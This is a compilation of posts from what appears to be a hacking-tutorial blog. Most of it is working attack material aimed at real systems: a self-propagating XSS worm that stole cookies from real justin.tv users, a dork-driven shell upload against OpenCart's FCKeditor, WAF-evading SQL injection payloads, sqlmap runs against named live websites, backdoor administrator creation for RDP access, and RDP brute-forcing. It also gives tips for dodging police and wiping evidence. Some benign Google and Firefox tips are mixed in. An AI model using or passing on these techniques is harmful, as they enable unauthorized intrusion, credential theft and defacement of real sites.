Creating an XSS Worm

XSS worms are pretty neat, interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how it was affective, and what challenges I faced.

The worm I created was in Justin.Tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and it's up to many different variables that the worm is successful.

The XSS in justin.tv was found by x2Fusion. x2Fusion and I worked on the worm right when we came up with the idea of making one.

The XSS was in the Location field. So, people viewing another user's profile would run whatever we put there, as it was not sanitized. But there was one more challenge: the location was placed in the title sanitized. We had to find a way to not only hide the worm in the title, but we also had to impliment some javascript that automatically changed the title as soon as it loaded.

Once we started on the worm, we made the .js file on an external website, and before script inclusion we put several HTML comment tags to hide it in the title. In the location javascript, we edited the location javascript (local) to dynamically remove the title, keeping it stealthy (as possible) to avoid other issues. The local javascript also made a hidden, blank iFrame that we could reference in the remove javascript.

To start off, the remote javascript would force the iframe to our website and provide, dynamically, the client's cookies and profile location. We would use this to track what profiles were infected by who, and when, and all of the client details at the time.

We would create the payload inside the remote javascript that we can use to inject with the viewing user's profile. The "payload" data is pretty much our local javascript. We also added a ^ (rare location element, if you ask me) character after the user's location, which our local javascript will use to manage the dynamic script.

What we didn't think about, well... we were in a hurry so it's not our fault, ^ would remain on the titles. People would definately notice, but it wasn't patched until about 24 hours after.

We printed a new iFrame (hidden), and used it to read out the details in convinient little sub-frame form elements. We took the elements and processed them, only changing the Location field if it wasn't already infected, and then sending the request (if it wasn't already infected).

This was more complicated as it seemed... we had to fight between IE and Firefox (Safari follows Firefox for the most part) compatibility. After doing that, we realized... if the infected person was... well an actual broadcaster, the default page wasn't what we were looking for. Thus, we needed to dynamically read whether certain elements were given on the page, and also go to the correctly named page.

We had another request upon new infections that saved user details.

Once the request was sent, by then it is assumed the profile was infected and we have it recorded on our side. In-fact, quickly after we released it, I made a quick little PHP script that waited for more accounts to be infected (and their userdetails), and printed out a highlighted table element had it fade out after 5 seconds. After about 1500 profiles, I sat there watching 4 to 10 be infected a second, and it was funny to watch them be infected life.

***Thanks***

For more Videos and tutorials please follow us on:

Like FB page /theprohackers2017

Join Pro Hackers Group: /groups/group.prohackers/

YouTube Channel: /channel/UCcyYSi1sh1SmyMlGfB-Vq6A

Website: www.prohackers[dot]in

5 Most Common Mistakes Done by Beginners in the field of Hacking

This post is for everyone out there who actually want to become a true hacker:-

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.

2) There is NO DIRECT SOFTWARE to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only readymade software’s and would depend on them for hacking anything then your functionality would be limited up to the functionality of the software. When you are not going to use your brain, just doing the copy paste thing, then how can you even think of being a good hacker?

5) If you are a good Hacker, you already become a good programmer, a good script writer, a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING, FOOTPRINTING etc… you will have to be good at programming and scripting. And when you know the various loop holes, vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimates the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Next time think before asking the question – “How much will I get in this field?” because, if you have so many skills, you really don’t have to run after money. Success comes and money follows itself.

***THANKS***

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

8) Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

***THANKS***

How To Upload Deface Remotly

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many people don't know this ... so i'm publishing here a tutorial here

1- open Google.com and enter Dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

nurl:Powered By OpenCart

You'll Got a lot of websites by google, select anyone ... For Example i got this one School Shopper Home Page Then i'll will simply add the vuln URL after the website

Example

FCKeditor - Connectors Tests

(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This

http://4.bp.blogspot.com/-lidWGvNV1v...4/s640/wp1.bmp

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)

http://2.bp.blogspot.com/-JD7gM3NbpD...Y/s400/wp2.bmp

and Now see file upload option and upload your deface or shell and for checking shell or deface check this url

www.site.com/deface.html

or

www.site.com/shell.php

***Thanks***

Bypassing WAF Filters in SQLi

What is WAF or Web Application Firewall>?

A web application firewall (WAF) is an appliance,server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Some website are using WAF filter.

If u found a vuln sites that have waf and u try to inject a Union based query and its Show's Not Acceptable, 403 forbidden or Web Application FIrewall ALERT..That means the query or syntax that u inject is Filter or Blocked by WAF.

Ok now here's some method to Bypass WAF filters.

1)Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:

//, ? , /**/, #, ?+, ? -, ;

2)Case Changing:

Some WAF?s will filter only lowercase attacks As we can see we can easily evade this by case changing:

Possible Regex filter:

/union\sselect/g

id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)

3)Inline Comments:

Some WAF?s filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example, let?s pretend a site filters union,where, table_name, table_schema, =, and information_schema.. These are 3 statements we need to inject our target.

For this we would:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()? -

The above code would bypass the filter. Notice we can use ?like? instead of ?=?

Another way to use inline comemnts, when everything seems to fail you can try to through the application Firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()? -

The above code should bypass the Union+select filters even where common inline comments didn?t work itself

4)Buffer Overflow:/Unexpected input:

A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it?s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A?s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),use r(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26

,27,28,29,30,31,32,33,34,35,36?+

This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords(preg_replace and/or WAF?s with the same action

Sometimes and application will remove all of a keyword. For instance, let?s say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

id=1+UNIunionON+SeLselectECT+1,2,3?

As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:

UNION+SELECT+1,2,3?

6)Character encoding:

Most WAF?s will decode and filter an applications input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while the Application will keep decoding the SQL statement executing our code.

Examples of double encoding:

id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users?+

***Thanks***

101 Google Tips, Tricks and Hacks

Looking for the ultimate tips for Google searching? You've just found the only guide to Google you need. Let's get started:

1. The best way to begin searching harder with Google is by clicking the Advanced Search link.

2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.

3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.

4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.

5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.

6. Save time – most of these advanced features are also available in Google's front page search box, as command line parameters.

7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire – it looks for smoke AND fire.

8. To make Google search for smoke or fire, just type smoke OR fire

9. Instead of OR you can type the | symbol, like this: smoke | fire

10. Boolean connectors like AND and OR are case sensitive. They must be upper case.

11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)

12. To look for phrases, put them in quotes: "there's no smoke without fire"

13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant

14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.

15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".

16. The plus operator makes sure stop words are included. Like: fish +and chips

17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.

18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *

19. Search for a numerical range using the numrange operator. For example, search for Sony TV between £300 and £500 with the string Sony TV £300..£500

20. Google recognises 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.

21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetypedf

22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc

23, In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" -onions filetype:doc

24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs

25. If you're looking for files rather than pages – give index of as the intitle: parameter. It helps you find web and FTP directories.

26. The modifier inurl only searches the web address of a page: give inurl:spices a go.

27. Find live webcams by searching for: inurl:view/view.shtml

28. The modifier inanchor is very specific, only finding results in text used in page links.

29. Want to know how many links there are to a site? Try link:sitename – for example link:www.mozilla.org

30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com

31. The modifier info:site_name returns information about the specified page.

32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.

33. Specify a site to search with the site: modifier – like this: search tips site:www.techradar.com

34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.

35. Access Google Directory – a database of handpicked and rated sites – at directory.google.com

36. The Boolean operators intitle and inurl work in Google directory, as does OR.

37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk

38. Similar, using "site:.com" will only return results from .com domains.

39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.

40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail

41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.

42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:

43. The general search engine can get very specific indeed. Try movie: to look for movie reviews.

44. The modifier film: works just as well!

45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.

46. For a dedicated film search page, go to www.google.co.uk/movies

47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.

48. Google really likes movies. Try typing director: The Dark Knight into the main search box.

49. For cast lists, try cast: name_of_film

50. The modifier music: followed by a band, song or album returns music reviews.

51. Try searching for weather London – you'll get a full 4-day forecast.

52. There's also a built-in dictionary. Try define: in the search box.

53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url

54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site.

55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search".

56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.

57. It does currency conversion too. Try 200 pounds in euros

58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.

59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.

60. Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google Search"...

61. You can personalise your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".

62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one...

63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.

64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions.

65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look.

66. Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day to night as you browse.

67. Click "More" under "Try something new" to access a full list of Google sites and new features.

68. "Custom Search" enables you to create a branded Google search for your own site.

69. An active, useful service missing from the list is "Personalised Search" – but you can access it via www.google.com/psearch when you're logged in.

70. This page lists searches you have recently made – and is divided into categories. Clicking "pause" stops Google from recording your history.

71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on!

72. Personalised Search also includes a bookmark facility – which enables you to save bookmarks online and access them from anywhere.

73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.

74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link.

75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!

76. Looking for a map? Just add map to the end of your query, like this: Leeds map

77. Google finds images just as easily and lists them at the top, when you add image to the end of your search.

78. Google Image Search recognises faces... add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.

79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance.

80. Enter the carrier and flight number in Google's main search box to return flight tracking information.

81. What time is it? Find out anywhere by typing time then the name of a place.

82. You may have noticed Google suggests alternate spellings for search terms – that's the built in spell checker!

83. You can invoke the spell checker directly by using spell: followed by your keyword.

84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.

85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.

86. If your search has none-English results, click "Translate this Page" to see it in English.

87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries sites to translate your query to.

88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.

89. There's also a box that you can enter a direct URL into, translating to the chosen language.

90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality.

91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.

92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.

93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.

94. You can also set Google to open your search results in a new window.

95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist

96. Another useful, experimental search can be found at www.google.com/trends – where you can find the hottest search terms.

97. To compare the performance of two or more terms, enter them into the trends search box separated by commas.

98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon

99. Perhaps the Swedish chef from the muppets is your role model instead? Check www.google.com/intl/xx-bork

100. Type answer to life, the universe and everything into Google. You may be surprised by the result...

101. It will also tell you the number of horns on a unicorn

***Thanks***

15 Ways To Help You Stay Out Of Jail, Ways To Survive As A Hacker

This article will show you some of the top ways the best *h*a*c*k*e*r*s use to keep themselves hidden and out of jail and to be a better hacker.

Note: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

1.Never tell anyone you are a hacker

2.Never hack without a proxy

3.Always use a proxy when doing anything remotely illegal

4.Never hack from your house

5.Never use your real name in a conversation or sign up sheet

6.Always use fake information when signing up for something such as an account

7.Never use the same password more than once

8.Never use a password that can be found in the dictionary

9.Always use a firewall

10.Never let the F.B.I. into your house without a warrant stating their intentions.

11.Never let the F.B.I. in period.

12.Always have a panic button that mass deletes all your questionable material.

13.Make sure that the deletion of your files it is at least in compliance with the Department of Defense deletion protocol if you have time; The Guttman Method is the best.

14.Never hack from the same computer twice if possible

15.Always wave to cops

You might say to yourself that you do not follow one or more of these rules. This is why most *h*a*c*k*e*r*s get caught. They forget to cover their tracks and get busted. The more rules you abide by, the better your chances are of staying hidden.

Some Uses of Perl and Python in Backtrack 5 r3

This is a little theory with we can to use perl and python. Let´s go!!

asp-auditor is a perl script created that allows you to find useful information on a web server.

First go to Backtrack 5 r3 dir: /Backtrack/Exploitation Tools/Web Exploitation Tools/asp-auditor.

Appear the following

Usage: ./asp-audit.pl [http://target/app/file.aspx] (opts)

(opts)

-bf brute force ASP.NET version using JS Validate

directories.

Now you see the next:

root@bt:/pentest/web/asp-auditor#

To use the script you need to run the following syntax:

perl asp-auditor.pl website/page.aspx options

After you put the following I used this web http://conalepsin.edu.mx/apps/chekt/Default.aspx

root@bt:/pentest/web/asp-auditor# perl asp-audit.pl http://conalepsin.edu.mx/apps/chekt/Default.aspx -bf

Sending initial probe request...

Sending path discovery request...

Sending ASP.NET validate discovery request...

Sending ASP.NET Apr/07 XSS Check

Sending application trace request...

Sending null remoter service request...

[ .NET Configuration Analysis ]

Server -> Microsoft-IIS/6.0

ADNVersion -> 2.0.50727

matches -> 2.0.50727.07 Version 2.0 (Visual Studio.NET 2005 CTP) Aug 2005

matches -> 2.0.50727.26 Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP) Sep 2005

matches -> 2.0.50727.42 Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM) Nov 2005

Sending brute force discovery requests...

Knowing websites vulnerable to Cross Site Scripting using Backtrack 5 r3. A little theory, a cross site scripting is a typical type of security hole Web application that allows third party websites inject the user views JavaScript code or in another script language similar.

To begin, start Backtrack 5 r3, once started is entered

Applications / Backtrack / Information Gathering / Web Application Analysis / Open Source Analysis / XSSed

The link is directed to http://www.xssed.com/archive website, which displays a list of websites vulnerable to Cross Site Scripting

To prevent such attacks, it is necessary for the proper configuration files of type javascript, php, vbscript, output filter content, in short, all entries entered by users must be verified before being used.

Here I leave this brief manual Fimap tool use in Backtrack 5 r3. A little theory, Fimap is a tool created in the python programming language, which allows you to explore and exploit such vulnerabilities RFI (reomte File Inclusion) or LIF (Local File Inclusion). It also allows, if you have an Internet connection, via google searchpaths vulnerability to Web sites.

To start, starts Backtrack 5 r3. Once initiated Entering directory / pentest / web / fimap;

cd / pentest / web / fimap

root@bt:~# cd /pentest/web/fimap

root@bt:/pentest/web/fimap# ./fimap.py -u 'http://www.website/news.php?id=108'

You can to look for with google dorks too

root@bt:/pentest/web/fimap# ./fimap.py -u 'index.php?id='

When the website is vulnerable to Remote File Inclusion is displayed on the terminal notifying exploitation. Fimap is a very good tool for administrators and whose main objective is to improve the quality and security of your website.

[B]SQLMAP

Sqlmap in Backtrack 5 r3. A little theory, sqlmap is a tool to detect and exploit SQL injection vulnerabilities thus obtaining full access to the database server Algin web, regardless of the type of operating system.

To use the tool, start Backtrack 5 r3 and Entering directory

/ pentest / database / sqlmap

root@bt:# cd /pentest/database/sqlmap/

Appear the following:

root@bt:/pentest/database/sqlmap#

Next steep:

root@bt:/pentest/database/sqlmap# ls

doc lib plugins README.md sqlmap.conf sqlmap.py tamper udf

extra output procs shell _sqlmap.py _sqlmap.pyc txt xml

After we write ./sqlmap.py -u http://www.weburl.com. I used a url http://www.centro-lomas.com.ar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.centro-lomas.com.ar/detalles.php?id=1

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

starting at 18:08:56

[18:08:57] [INFO] testing connection to the target url

[18:08:59] [INFO] testing if the url is stable, wait a few seconds

[18:09:00] [INFO] url is stable

[18:09:00] [INFO] testing if GET parameter 'id' is dynamic

[18:09:01] [INFO] confirming that GET parameter 'id' is dynamic

[18:09:01] [INFO] GET parameter 'id' is dynamic

[18:09:02] [INFO] heuristics detected web page charset 'ascii'

[18:09:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[18:09:02] [INFO] testing for SQL injection on GET parameter 'id'

[18:09:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[18:09:03] [WARNING] reflective value(s) found and filtering out

[18:09:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[18:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[18:09:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[18:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[18:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[18:09:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable

[18:09:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[18:09:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found

[18:09:16] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[18:09:18] [INFO] target url appears to have 6 columns in query

[18:09:19] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 18 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 2747=2747

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a717 4773a), NULL, NULL, NULL, NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1 AND SLEEP(5)

---

[18:09:28] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.13, Apache 2.2.22

back-end DBMS: MySQL 5.0

[18:09:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.centro-lomas.com.ar'

shutting down at 18:09:28

Also if you want to use the helper to run the tool incorporates the following syntax:

./sqlmap.py --wizard

root@bt:/pentest/database/sqlmap# ./sqlmap.py --wizard

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

starting at 18:10:02

Please enter full target URL (-u): http://www.centro-lomas.com.ar/detalles.php?id=1

POST data (--data) [Enter for None]:

Injection difficulty (--level/--risk). Please choose:

[1] Normal (default)

[2] Medium

[3] Hard

> 3

Enumeration (--banner/--current-user/etc). Please choose:

[1] Basic (default)

[2] Smart

[3] All

> 1

sqlmap is running, please wait..

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 2747=2747

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a717 4773a), NULL, NULL, NULL, NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1 AND SLEEP(5)

---

web application technology: PHP 5.3.13, Apache 2.2.22

back-end DBMS: MySQL 5.0

banner: '5.1.66-cll'

current user: 'cenlom09_gestor@localhost'

current database: 'cenlom09_capacitacion'

current user is DBA: None

shutting down at 18:10:53

The assistant will guide you through the setup of the website you want to test the vulnerability.

Mozilla Firefox - The hacker's choice

The security testers or the hackers have a lot of tool to play around with . But what if Your browser helps you in this ?

The magical browser is Mozilla Firefox and the extensions/add-ons developed by the professional ethical hackers and penetration testers..

In this article i will tell you some of the best add-ons of all time that hacker uses....

Download Firefox from Google

Now back to topic

Social engineering add-on

People Search and Public Record: This Firefox extension is a very handy tool for investigators,hackers,legal professionals, and anyone interested in doing their own basic people searches and public record look ups as well as background research.

Google and Spider

Advanced dork : Gives quick access to Google’s Advanced Dorks directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously.

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack

Editors (WEBMASTER)

JSView : The ’view page source’ menu item now opens files based on the behavior you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor..

Firebug : Firebug integrates with Firefox to put a wealth of development tools at your hand while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page

XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.

Headers manipulation and agent switcher

HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl : Control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser

Cookies manipulation/editors

Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.

httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side

Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file

Security Tools

HackBar : This toolbar will help in testing sql injections, XSS holes and site security.This tool will not help you to exploit the vulnerability or to learn hacking. Its main purpose is to help a hacker do security audits on his code.

Tamper Data : tamper data to view and modify HTTP/HTTPS headers and post parameters.

Chickenfoot: Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing

Proxy utilities

POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side Javascriptto run a server inside your browser. Use it to distribute files from your browser. It supports Server-side JS, GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.

FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s proxy configuration. It offers more features than SwitchProxy, Proxy Button etc

SwitchProxy: SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes

Miscellaneous

Hacks for fun

Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript.scripts could be download at user scripts

Windows Rooting | How to get RDP Access.

windows Rooting System or how to gain RDP Access.

NOTE: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

Well this is diffirent from *Unix process there we use exploit here we use only commands and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....

What we need:

-Shell atteched on Some Site

-Server must be runing on Windows OS

We access our shell and go to the command console and we frist gonna check who we are:

Code:

whoami

This command is to check with what user we are running and its can show us like:

Code:

Administrator or SystAdmin

Thats good we are running like administrator cool letz see how many users have on the server:

Code:

net user

And we gonna see something like :

Code:

C:\Users\Administrator>net user

\\SERVER **********

Administrator Guest Remote

Command Successfully executed.

So this means that there are like 3 users on the this server :

Administrator,Guest,Remote

So we can try to add a new user ex: Dark-X

Code:

net user Dark-X /add

This command is for adding user with password:

Code:

net user Username Password /add

when we execute this command we will get some windows saying:

Code:

Command Successfully executed.

now letz check:

Code:

net user Dark-X

Will display something like this:

Code:

Username: Dark-X

Name: Dark-X

Last Time Online: XX:XX:XX-XX/XX

Local Group: *User

So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:

Code:

Net localgroup Dark-X Administrator /add

and we will see agaen this line:

Code:

Command Successfully executed.

If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.

Windows RDP Starting:

Code:

Start Menu=>All Programs=>Accessories=>Remote Desktop Connection

Linux:

Code:

Open Terminal write: rdesktop -u Username -p Password IP

or

Code:

rdesktop IP

Well Guys one more tutorial finished...:-)

RDP/VPS Crack Method Tutorial

Here is a small tutorials about Cracking Remote Desktop Protocol (RDP) and VPS.

NOTE: This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

In this method

we will use nmap + Dubrute

Download link :

http://uploading.com/117b4232/DUbrute-Scanner-IP-zip

This methos should work in VPS or RDP no in ur own pc

Steps :

Nr.1 We install nmap on our rdp .

Nr.2 open windows batcher file to scan ips

Nr.3 After scann is finished it will be created a .txt file with the IP results ..

Now we are done with the IP scanning .

Nr.4 Open Dubrute

Nr.5 Go Generation

Nr.6 File Ips place with resultat.txt

Nr.7 File Usernames place with Usernames.txt

Nr.8 File Passwords place with passwords.txt

Nr.9 Put Make then EXIT

